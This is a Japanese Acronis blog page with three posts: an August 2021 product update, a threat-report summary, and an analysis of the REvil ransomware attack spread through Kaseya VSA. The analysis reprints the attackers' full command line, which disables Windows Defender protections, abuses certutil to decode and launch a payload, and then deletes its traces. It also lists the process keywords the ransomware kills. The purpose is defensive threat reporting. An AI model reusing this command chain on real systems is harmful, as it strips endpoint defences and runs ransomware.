2021年09月03日 — 4 分で読めます
Acronis
2021年09月03日 — 4 分で読めます
Acronis Cyber Protect Cloudの新機能-2021年8月
MSPは顧客のデータのセキュリティ、管理および整合性をサポートしながら、生産性と優れたユーザーエクスペリエンスを維持する必要があります。これらは大きな責任ですが、アクロニスは定期的な製品アップデートと受賞歴のあるサイバープロテクションソリューションの画期的な新機能により、パートナーの皆さまの課題解決を支援します。 今月、アクロニスはデータの可視性と管理を強化するAcronis Cyber Protect Cloudの新機能の公開を発表し、無償で提供される新しいリモートアクセスツールAcronis Cyber Desktopをご紹介いたします。 ハードではなくスマートに働く 2021年8月にリリースされたAcronis Cyber Protect Cloudには、サービスプロバイダー向けの新機能がいくつか含まれており、管理プロセスを合理化し、セキュリティを強化し、顧客に提供する価値をより明確に示すことができるように設計されています。        WindowsおよびmacOSのネットワーク保護フォルダパスを差別化 WindowsまたはmacOSのいずれかのネットワークフォルダ保護復元パスを個別に指定することにより、単一の保護計画でWindowsとmacOSの両方のワークロードを保護することができます。        顧客向けエグゼクティブサマリーレポートのための直感的なセクション管理 エグゼクティブサマリーレポートは効率的に顧客にサービスの価値を示すことができます。レポート内のセクションの追加や命名、順序変更により、顧客のビジネス組織をより的確に表します。      電子署名の中で使用されたリンクの視認性と管理を強化 ユーザーは、Advanced File Sync and Shareの電子署名機能のためのリンクをより効率的に管理できるようになりました。これにより、共有されたリンクを表示、編集、削除できるようになりました。また、リンクの種類や有効期限ごとに履歴が表示されるようになりました。 今回のアップデートでは、Acronis Cyber Desktopも導入されています。直感的なリモートサポートおよびリモートアクセスツールツールであるAcronis Cyber Desktopは、クライアントがエンドポイントに物理的に存在しない場合でも、離れた場所から迅速かつ容易に顧客をサポートすることで、効率を最大限に高めることができます。   リモート環境で問題を診断・解決し、顧客の生産性をサポート お客様のビジネスに最も適したスケジュールで無人のデバイスにアクセスすることにより、クライアントの効率性と自社の効率性との両方を向上 Acronis Cyber Desktopは現在、Windows、macOS、Linuxなど、さまざまなプラットフォームやOSで利用可能です。 今月リリースされた新機能の詳細についてはリリースノートをご覧ください。また、What’s New ページ では、Acronis Cyber Protect Cloudの今後の最新の機能追加および強化についてご紹介しています。
2021年08月06日 — 7 分で読めます
Acronis
2021年08月06日 — 7 分で読めます
サイバー攻撃で中小企業は実存的な脅威に直面
サイバー脅威、特にランサムウェアは今年、かなりのニュースで取り上げられました。コロニアル・パイプラインへの攻撃は、広範なガソリン不足と輸送機関の大混乱をもたらし、JBSへの攻撃は世界中サプライチェーンを混乱させました。 Acronis Cyberthreats Report Mid-year 2021 update(アクロニス サイバー脅威レポート2021中間アップデート)では、今年の上半期の脅威の状況に新たな問題が見つかっただけではありません。中小企業が重大なリスクにさらされていることも明らかになっており、サービスプロバイダーはこれに対応する必要があります。 中小企業(SMB)はこれまで以上に大きなリスクに直面 中小企業は「標的にするには小さすぎる」と安心しているかもしれません。しかし実際には、攻撃の自動化やITサービスプロバイダーに対するサプライチェーン攻撃の増加により、中小企業の脆弱性はますます高まっています。サイバー犯罪者は一度に複数の顧客を侵害するために、マネージドサービスプロバイダーを標的にしようと躍起になっています。多くの中小企業にとっては、1回の攻撃が成功しただけで、死の宣告を受けることになります。 2021年上半期には、75%の組織がサードパーティベンダーのエコシステムの脆弱性に起因するサイバーセキュリティ侵害を経験したことが明らかになりました。これは、データ侵害による平均コストが約356万ドルに上り、ランサムウェアの平均支払額が33%急増して10万ドルを超えた時期と重なります。これらの被害はどのような組織にとっても大きな経済的打撃となりますが、平均的な中小企業にとっては致命的な数字です。 アクロニス サイバー脅威レポート2021中間アップデートで判明した主な調査結果を次にご紹介します。 フィッシング攻撃がまん延しています。不注意なユーザーを騙して悪意のある添付ファイルやリンクをクリックさせるソーシャルエンジニアリング手法を用いたフィッシング攻撃が第1四半期から第2四半期にかけて、62%増加しました。マルウェアの94%は電子メール経由で届けられているため、この急増は特に懸念事項となっています。同時期、アクロニスは顧客のために39万3,000件以上のフィッシングおよび悪意のあるURLをブロックし、攻撃者が貴重なデータにアクセスしたり、顧客のシステムにマルウェアを注入したりするのを防ぎました。 データ流出も増加の一途をたどっています。2020年には、ランサムウェアの被害者のうち1,300名以上が、攻撃を受けた後に各自のデータを公に流出されています。これは、サイバー犯罪者がインシデントを成功させて得る金銭的利益を最大化しようとしているためです。今年の上半期には、すでに1,100件以上のデータ流出が公表されており、年間で70%増加すると予測しています。 リモートワーカーが引き続き主要なターゲットとなるでしょう。 新型コロナウイルスのパンデミックを受けて、リモートワーカーへの依存が続いています。現在、リモートワーカーの3分の2は、仕事用のデバイスを個人的なタスクに使用したり、個人の自宅用デバイスを業務に使用したりしています。その結果、攻撃者は積極的にリモートワーカーを調査するようになりました。アクロニスは、RDP(リモートデスクトッププロトコル)を介したリモートマシンに対するブルートフォース攻撃が300%増加し、世界的なサイバー攻撃の数が2倍以上になったことを確認しました。 Black Hat 2021でのアクロニスの講演 中小企業には、今日の脅威に対抗するために必要な資金やリソース、あるいは人材に関する専門知識が備わっていないため、ITサービスプロバイダーを頼っています。顧客はマネージドサービスプロバイダーに対し、最先端の攻撃から効果的に保護するソリューションを求めるだけでなく、サイバー脅威の状況における最新の動向を把握し、それに応じた対応をすることも求めています。 8月4日に開催されたBlack Hat 2021では、アクロニスのサイバープロテクション研究所担当バイスプレジデントであるキャンディッド・ヴュースト(Candid Wüest)が「Ransomware Attacks Against MSPs – A Nightmare for SMBs(MSPに対するランサムウェア攻撃 – 中小企業の悪夢)」と題したセッションで、このレポートで得られた知見のいくつかを紹介しました。 地域別のランサムウェア攻撃 今回の「Acronis Cyberthreats Report Mid-year 2021(アクロニス サイバー脅威レポート2021 中間アップデート版)」は、サイバー脅威を24時間365日体制で監視・調査する、アクロニス サイバープロテクション オペレーションセンター(CPOC)のグローバルネットワークによって収集された攻撃や脅威のデータに対する調査に基づいて作成されました。マルウェアデータは、Acronis Cyber Protectを使用している、世界各地の25万を超える一意のエンドポイント(Acronis Cyber Protect Cloudを使用しているMSPのクライアント、またはAcronis Cyber Protect 15を稼働している企業)で収集されたものです。この中間アップデートのレポートは、2021年1月~6月に検出された、エンドポイントを標的とした攻撃を対象としています。 「Acronis Cyberthreats Report Mid-year 2021(アクロニス サイバー脅威レポート2021 中間アップデート版)」の全文はこちらからダウンロードいただけます。
2021年07月09日 — 11 分で読めます
Acronis
2021年07月09日 — 11 分で読めます
ランサムウェア「REvil」によるMSPへのサプライチェーン攻撃について
大規模なSolar Winds社へのソフトウェアサプライチェーン攻撃のことを人々が忘れかけていた頃、またしても注目を集める攻撃が起こりました。今回は、REvil/SodinokibiランサムウェアグループがKaseya社のITマネジメントソフトウェア「VSA」の悪意あるアップデートを配信したことにより、世界中の数十ものMSPとその顧客がランサムウェアによって危険に晒されたようです。例えば、スウェーデンの小売企業Coopは、サイバー攻撃の影響を受け、土曜日に800以上の店舗を閉鎖しました。 アクロニス サイバープロテクションオペレーションセンター(CPOC)のグローバルネットワークは、攻撃の詳細がまだ解明されていないため、状況を監視しています。現時点で判明していることは、次の通りです。 最初の攻撃 2021年7月2日の午後、攻撃者はランサムウェアの配布を開始しました。この攻撃が、米国の独立記念日という祝日による長期休暇のはじめに怒ったことは驚くべきことではありません。これはサイバー犯罪者に人気がある戦術です。というのも、このような時期、企業はいつもより少ないスタッフで営業していることが多いため、サイバー犯罪者が攻撃を実行しやすくなるからです。 Kaseya社における最初の感染要因と、正確な内容はまだ明らかになっていません。同社によると、攻撃者はVSAマネージャのゼロデイ脆弱性を利用してアクセスし、接続されているすべてのクライアントに対して独自のコマンドを実行した可能性が高いようです。Kaseya社のチームはこの件を調査中で、ウェブサイトに定期的に最新情報を掲載しています。 どうやら、オランダの研究者が以前、CVE-2021-30116を含む管理ソフトウェアにいくつかの脆弱性があることを報告していたようですが、それがサイバー犯罪者に利用されたのと同じ脆弱性であるかどうかは、まだ分かっていません。発見後、Kaseya社はさらなる感染を防ぐための予防措置として、同社のSaaSサーバーをシャットダウンしました。顧客には、オンプレミスにインストールされたVSAをシャットダウンすることを推奨しています。 情報流出 攻撃者がVSAアプリケーションにアクセスできるようになると、VSAへの管理者アクセスを停止し、接続されているすべてのクライアントに「Kaseya VSA Agent Hot-fix」という名称の悪意のあるアップデートの配布を開始します。 このアップデートは、リアルタイムモニタリングの無効化やマルウェアレポートの無効化など、ローカルのセキュリティ設定を低下させるために、複数のPowerShellコマンドを起動します。 C:\WINDOWS\system32\cmd.exe /c ping 127.0.0.1 -n 4223 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe PowerShellコマンドは、マイクロソフト社の正規のcertutilツールを使用して暗号化されたペイロードファイルagent.crtを復号化します。これは、多くの攻撃で見られる一般的な「Living Off The Land ( LOTL:環境寄生型/自給自足型 ) 」攻撃です。今回の攻撃では、最初にC:Windows\cert.exeにツールがコピーされ、次に復号化されたペイロード (agent.exe) がKaseya社のテンポラリディレクトリに作成されます(通常はc:\kworking\agent.exeにあります)。 agent.exeファイルは、「PB03TRANSPORT LTD.」に対して発行された証明書を使用してデジタル署名されており、2つのファイルが含まれています。ファイルが実行されると、REvilの暗号化モジュールである「mpsvc.dll」と、古いもののクリーンなWindows Defenderのバイナリである「MsMPEng.exe」がWindowsフォルダにドロップされます。次に、Windows Defenderアプリケーションが起動し、暗号化が開始される前にdllサイドロードの脆弱性を介して悪意のあるペイロードが読み込まれます。 このドロッパーが有効なデジタル証明書で署名されており、悪意のあるdllをサイドロードするために正規のWindows Defenderバイナリを使用しているという事実は、従来のセキュリティツールによる検出をより困難にしています。なぜなら、これらのツールは署名されたファイルを検知せず、すり抜けることが多いからです。しかし、Acronis Cyber Protectソリューションは、特許取得済みのプロセスインジェクション検知により、これに騙されることなくマルウェアを検知します。その後、デジタル証明書は失効しています。 ランサムウェア攻撃によくみられるように、このREvilの亜種は、バックアップを削除し、バックアップやセキュリティアプリケーションに関連付けられたサービスを停止しようとします。設定ファイルは、次のキーワードを持つプロセスを停止するよう設定されています:veeam、memtas、sql、backup、vss、Sophos、svc$、mepocs。Acronis Cyber Protectは、自己防御機能によりセキュリティモジュールの改ざんやバックアップの削除を防ぎます。 保護機能 Acronis Cyber Protectは、複数のレベルでこの攻撃を事前に検知、阻止します。 脅威にとらわれないAcronis Active Protectionのランサムウェア対策テクノロジーは、ランサムウェア攻撃をブロックし、攻撃によって影響を受ける可能性のあるファイルを自動的に復元します。 プロセスインジェクションヒューリスティックは、マルウェアによる不審な動作を検知、ブロックします。 静的シグネチャとファイルレピュテーションが、実行前にファイルをブロックします。 高度な振る舞い検知エンジンにより、環境寄生型 (Living Off The Land) 攻撃を検知することができます。 URLフィルタリングにより、コマンド&コントロールサーバーへのアクセスをブロックできます。 Acronis Cyber Protectは、サイバーセキュリティとバックアップおよびディザスタリカバリを独自に統合しているため、影響を受けたワークロードを迅速に復元し、業務を継続させることができます。 動機 Solar Winds社へのソフトウェアプライチェーン攻撃がデータ流出に焦点を当てていたのとは対照的に、今回の事件は金銭的な動機によるものと思われます。これまでの分析で、悪意のあるアップデートには、データを流出させるためのコマンドは含まれていませんでした。このような二重の脅迫は、REvil/Sodinokbiを含むランサムウェアグループで非常に人気があります。今年はすでに1,100社以上の企業がデータをリークサイトで公開しています。 恐らく攻撃者たちは、ソフトウェアサプライチェーン攻撃の技術的な性質から、データの発見と流出を省略し、代わりにデータの暗号化を直接行うことにしたのかもしれません。今回のREvilの身代金要求のスクリーンショットを見ると、4万5千米ドルから500万米ドルまでと様々なようです。いまのところ身代金の支払いを認めた企業はありません。 REvilグループはリークサイトで、100万台以上のコンピューターの感染に成功したと主張しています。彼らは汎用的な復号化ツールを7,000万ドルで提供するとしていますが、これはJBS社が6月に支払ったとされる1,100万ドルという単独の身代金要求と比べると、かなり低い金額だと思われます。 一部の研究者は、文字列の中にジョー・バイデン大統領、ドナルド・トランプ前大統領、Black Lives Matter(黒人の命を守れ)といった記載があることから、政治的な動機に基づく破壊行為である可能性を示唆しています。 例えば、次のレジストリキーに設定された内容が保存されています。 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter 概要 MSPは価値の高いターゲットです。攻撃対象が大きく、サイバー犯罪者にとっては格好の標的となります。平均して1つのMSPが100社のITを管理することができるため、犯罪者は100社の異なる企業を攻撃するのではなく、1つのMSPをハッキングするだけで、その100社の顧客にアクセスすることができます。 昨年発表した「Acronis Cyberthreat Report 2020」で私たちが予測したように、今年はますますMSPが標的になるでしょう。MSPはさまざまな手法で攻撃を受ける可能性がありますが、中でもリモートアクセスソフトウェアの設定が不十分であることが、攻撃経路の上位に挙がっています。サイバー犯罪者は二段階認証(2FA)が設定されていないという弱点やフィッシング技術を利用して、MSPの管理ツールにアクセスし、最終的には顧客のPCにまでアクセスします。 MSPの管理ツールを介してランサムウェアが配布されるのは、目新しいことではありません。2年以上前、ランサムウェアグループ「GandCrab」は、ConnectWise管理ソフトウェアのKaseyaプラグインの脆弱性を利用してランサムウェアを展開しました。 この攻撃ベクトルについて詳しく知りたい方は、まさにこのトピックを取り上げたBlackHat US21の講演「Ransomware attacks against MSPs a nightmare for SMBs」にご参加いただくことをお勧めします(英語のみ)。 信頼できるMSPを経由したランサムウェア攻撃は、今回が初めてではなく、また今後も続くでしょう。侵害されたMSPは、サプライチェーン攻撃において忘れられたリンクとなるからです。そのため、このような事態を防ぐためには、総合的なサイバープロテクションの導入が不可欠です。 なお、サイバー攻撃の被害に遭わないための方法については、当社のブログをご覧ください。 IoC:   コミュニティを通じて報告されたサンプル   サイドローディングに使用されているWindows Defenderアプリケーションの削除